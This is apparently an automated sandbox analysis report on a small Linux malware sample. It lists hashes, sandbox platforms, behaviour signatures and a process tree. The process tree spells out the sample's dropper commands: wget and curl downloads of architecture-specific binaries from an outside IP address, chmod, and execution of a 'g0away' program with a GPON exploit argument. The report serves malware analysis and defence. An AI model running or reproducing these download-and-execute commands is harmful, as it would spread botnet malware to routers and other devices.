Analysis
- max time kernel: 92s
- max time network: 93s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240729-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 28-07-2024 16:40
Static task
- static1
Behavioral tasks
- behavioral1: sample 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118, resource ubuntu1804-amd64-20240729-en
- behavioral2: sample 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118, resource debian9-armhf-20240729-en
- behavioral3: sample 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118, resource debian9-mipsbe-20240729-en
- behavioral4: sample 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118, resource debian9-mipsel-20240729-en
General
- Target: 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
- Size: 3KB
- MD5: 17f41b4b65e5ddad4a76594560d43927
- SHA1: bb7691396c850ff2b4645b90336852650aa26eb6
- SHA256: 36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588
- SHA512: 602d2b3fda5948c263ab2c48f96993daf5ef404faec82cb2e7f55eae7c8dbed3525b6715f537629d7299c3f4e43077bcf1429b81375e7b2e16f398768920b322
Malware Config
Signatures
- Executes dropped EXE (13 IoCs)
  Processes (ioc / pid / process):
    /tmp/g0away  708  g0away
    /tmp/g0away  714  g0away
    /tmp/g0away  720  g0away
    /tmp/g0away  729  g0away
    /tmp/g0away  735  g0away
    /tmp/g0away  741  g0away
    /tmp/g0away  747  g0away
    /tmp/g0away  753  g0away
    /tmp/g0away  759  g0away
    /tmp/g0away  765  g0away
    /tmp/g0away  771  g0away
    /tmp/g0away  777  g0away
    /tmp/g0away  783  g0away
- Reads runtime system information (13 IoCs)
  Reads data from /proc virtual filesystem.
  Processes: File opened for reading /proc/sys/crypto/fips_enabled by curl (13 occurrences, one per curl process)
- Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  Processes: File opened for modification /tmp/g0away by 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Processes
- /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 (PID 699)
  Command line: /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
  Signatures: Writes file to tmp directory
  Child processes:
  - /usr/bin/wget (PID 700): wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
  - /usr/bin/curl (PID 705): curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86 [Reads runtime system information]
  - /bin/cat (PID 706): cat m3th.x86
  - /bin/chmod (PID 707): chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9
  - /tmp/g0away (PID 708): ./g0away gpon8080.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 710): wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
  - /usr/bin/curl (PID 711): curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips [Reads runtime system information]
  - /bin/cat (PID 712): cat m3th.mips
  - /bin/chmod (PID 713): chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9
  - /tmp/g0away (PID 714): ./g0away gpon8080.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 716): wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
  - /usr/bin/curl (PID 717): curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl [Reads runtime system information]
  - /bin/cat (PID 718): cat m3th.mpsl
  - /bin/chmod (PID 719): chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9
  - /tmp/g0away (PID 720): ./g0away gpon8080.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 722): wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
  - /usr/bin/curl (PID 723): curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm [Reads runtime system information]
  - /bin/cat (PID 727): cat m3th.arm
  - /bin/chmod (PID 728): chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - /tmp/g0away (PID 729): ./g0away gpon8080.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 731): wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
  - /usr/bin/curl (PID 732): curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5 [Reads runtime system information]
  - /bin/cat (PID 733): cat m3th.arm5
  - /bin/chmod (PID 734): chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - /tmp/g0away (PID 735): ./g0away gpon8080.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 737): wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
  - /usr/bin/curl (PID 738): curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6 [Reads runtime system information]
  - /bin/cat (PID 739): cat m3th.arm6
  - /bin/chmod (PID 740): chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - /tmp/g0away (PID 741): ./g0away gpon8080.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 743): wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
  - /usr/bin/curl (PID 744): curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7 [Reads runtime system information]
  - /bin/cat (PID 745): cat m3th.arm7
  - /bin/chmod (PID 746): chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - /tmp/g0away (PID 747): ./g0away gpon8080.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 749): wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
  - /usr/bin/curl (PID 750): curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc [Reads runtime system information]
  - /bin/cat (PID 751): cat m3th.ppc
  - /bin/chmod (PID 752): chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - /tmp/g0away (PID 753): ./g0away gpon8080.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 755): wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
  - /usr/bin/curl (PID 756): curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k [Reads runtime system information]
  - /bin/cat (PID 757): cat m3th.m68k
  - /bin/chmod (PID 758): chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - /tmp/g0away (PID 759): ./g0away gpon8080.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 761): wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
  - /usr/bin/curl (PID 762): curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc [Reads runtime system information]
  - /bin/cat (PID 763): cat m3th.spc
  - /bin/chmod (PID 764): chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - /tmp/g0away (PID 765): ./g0away gpon8080.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 767): wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686
  - /usr/bin/curl (PID 768): curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686 [Reads runtime system information]
  - /bin/cat (PID 769): cat m3th.i686
  - /bin/chmod (PID 770): chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - /tmp/g0away (PID 771): ./g0away gpon8080.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 773): wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4
  - /usr/bin/curl (PID 774): curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4 [Reads runtime system information]
  - /bin/cat (PID 775): cat m3th.sh4
  - /bin/chmod (PID 776): chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - /tmp/g0away (PID 777): ./g0away gpon8080.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 779): wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc
  - /usr/bin/curl (PID 780): curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc [Reads runtime system information]
  - /bin/cat (PID 781): cat m3th.arc
  - /bin/chmod (PID 782): chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - /tmp/g0away (PID 783): ./g0away gpon8080.exploit [Executes dropped EXE]